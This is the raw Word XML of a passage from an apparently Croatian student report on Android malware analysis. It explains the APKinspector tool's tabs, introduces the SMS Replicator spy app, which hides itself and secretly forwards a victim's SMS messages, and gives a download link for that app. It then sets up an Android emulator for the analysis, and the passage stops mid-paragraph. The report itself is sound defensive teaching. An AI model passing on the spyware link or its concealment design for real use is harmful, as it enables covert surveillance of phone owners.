    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc406756499"/>
      <w:bookmarkStart w:id="56" w:name="_Toc406756612"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica datoteka prikazuje sve izvorišne datoteke sadržane u paketu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc406756500"/>
      <w:bookmarkStart w:id="58" w:name="_Toc406756613"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="00C032C0" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica Stringova prikazuje ASCII Stringove u paketu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc406756501"/>
      <w:bookmarkStart w:id="60" w:name="_Toc406756614"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Classes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica razreda prikazuje razrede sadržane u paketu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="61" w:name="_Toc406756502"/>
      <w:bookmarkStart w:id="62" w:name="_Toc406756615"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Methods</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kartica metoda prikazuje stablasti pogled paketa programa namijenjenog za android do listova koji sadržavaju metode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc406756503"/>
      <w:bookmarkStart w:id="64" w:name="_Toc406756616"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>APKInfo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="00C032C0" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Ovdje su sadržane sve globalne informacije o .apk datoteci te alatima. Sadrži informacije kao što sui me datoteke, verzija koda, ime verzije, paketi, primatelji, servisi te dozvole.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc406756504"/>
      <w:bookmarkStart w:id="66" w:name="_Toc406756617"/>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Radio gumbi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="0086242F" w:rsidRDefault="003B3B23" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Radio gumbi Search i Filter omogućuju analitičarima da brzo pretražuju Stringove, metode, razrede te datoteke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086242F" w:rsidRDefault="0086242F" w:rsidP="00C032C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C095D" w:rsidRDefault="00B35A13" w:rsidP="007C095D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3386455" cy="522605"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="11" name="Slika 11" descr="Sporedni prozor - radio gu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redni prozor - radio gumb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6455" cy="522605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C095D" w:rsidRPr="007C095D" w:rsidRDefault="00327E2E" w:rsidP="00494B91">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 3.5</w:t>
      </w:r>
      <w:r w:rsidR="007C095D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Radio gumbi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00C032C0" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc406756505"/>
      <w:bookmarkStart w:id="68" w:name="_Toc406756618"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Primjer analize zloćudnog programa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="00400C18" w:rsidRDefault="00400C18" w:rsidP="00D83909">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Kao primjer se analizira zloćudni program SMS Replicator. Program je bio dostupan na GooglePlayu po cijeni od $4.99, a služi za špijuniranje, odnosno tajno slanje SMS poruka na bilo koji odabrani broj</w:t>
      </w:r>
      <w:r w:rsidR="00D83909">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> mobitela</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Program, nakon preuzimanja i instalacije, sakrije se tako da ne pokazuje </w:t>
      </w:r>
      <w:r w:rsidR="00D83909">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>nikakvu ikonu ili procese vidljive korisniku. Također je stizao s deaktivacijskom lozinkom kojom bi se korisniku omogućio ulaz u postavke radi mijenjanja lozinke, broj mobitela na koji će se SMS proslijediti ili pak aktivacija/deaktivacija samog programa. Program je izbačen iz GooglePlaya nekoliko sati nakon distribucije.</w:t>
      </w:r>
      <w:r w:rsidR="009A7863">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Može se preuzeti sa sljedeće stranice:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="009A7863" w:rsidP="009A7863">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>http://getandroidstuff.com/download-sms-replicator-android-secret-spy-app/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="009A7863">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="00D83909" w:rsidP="00D83909">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc406756506"/>
      <w:bookmarkStart w:id="70" w:name="_Toc406756619"/>
      <w:r>
        <w:t>Zadatak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="0086242F" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Zadatak ove analize je instalirati program te zatim korištenjem programa APKinspector ustanoviti segmente zloćudnog koda.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="00D83909" w:rsidP="00D83909">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="00D83909" w:rsidP="00D83909">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc406756507"/>
      <w:bookmarkStart w:id="72" w:name="_Toc406756620"/>
      <w:r>
        <w:t>Instalacija programa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="00D83909" w:rsidRDefault="00D83909" w:rsidP="00A12BF6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Budući da će u analizi ovog programa biti potrebno slati lažirane SMS poruke na virtualni uređaj, koristit će Android Virtual Device koji se nalazi u razvoj</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>im alatima za Android, odnosno SDK-u (engl. Software Development Kit).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12BF6" w:rsidRDefault="00A12BF6" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>AVD se može pokrenuti unutar integriranog razvojnog okruženja (IDE – engl. Integrated Development Environment)</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> preko komandne linije</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ili klikom na „</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>AVD Manager.exe”</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> datoteku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. U ovoj analizi će se pokrenuti </w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">jednostavnim klikom na </w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> datoteku, a ona se nalazi u direktoriju gdje je raspakiran SDK, u daljnjem tekstu označen kao </w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;SDK_HOME_FOLDER&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Ako se ne nalazi tamo, tada „</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A" w:rsidRPr="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>AVD Manager.exe</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>” treba prekopirati iz „</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A" w:rsidRPr="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;SDK_HOME_FOLDER&gt;/tools/lib</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>” u „</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>&lt;SDK_HOME_FOLDER&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00BA144A">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>”. Otvori se AVD Manager te se kreira novi virtualni uređaj klikom na Create...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005843CE" w:rsidRDefault="00B35A13" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5456555" cy="3416300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Slika 12" descr="AVD -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D - Crea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6555" cy="3416300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="007A41E5" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C24408">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>1. AVD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRPr="00C24408" w:rsidRDefault="00C24408" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="00A139E9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Unesu se postavke uređaja te se zatim klikne na OK. Preporuč</w:t>
      </w:r>
      <w:r w:rsidR="00A139E9">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>uje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se izrada uređaja s minimalnim performansama jer se AVD vrlo sporo učitava.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00B35A13" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3928745" cy="5857875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="Slika 13" descr="Stvaranje novog uređ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varanje novog uređaj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8745" cy="5857875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRPr="00C24408" w:rsidRDefault="005E4AF9" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.2</w:t>
      </w:r>
      <w:r w:rsidR="00C24408" w:rsidRPr="00C24408">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Primjer postavki performansi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Zatim se odabere stvoreni uređaj, klikne se na gumb Start... te u iskočnom prozoru na OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00B35A13" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5345430" cy="3828415"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="14" name="Slika 14" descr="AVD -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VD - St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5430" cy="3828415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00CE7010" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C24408">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>3. AVD – pokretanje virtualnog stroja</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00B35A13" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2280920" cy="3516630"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="15" name="Slika 15" descr="AVD - Launch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D - LaunchOp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0920" cy="3516630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRPr="00C24408" w:rsidRDefault="00022822" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 4.</w:t>
      </w:r>
      <w:r w:rsidR="00C24408">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>4. AVD – Launch Options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24408" w:rsidRDefault="00C24408" w:rsidP="00BA144A">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7863" w:rsidRDefault="009A7863" w:rsidP="00C24408">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
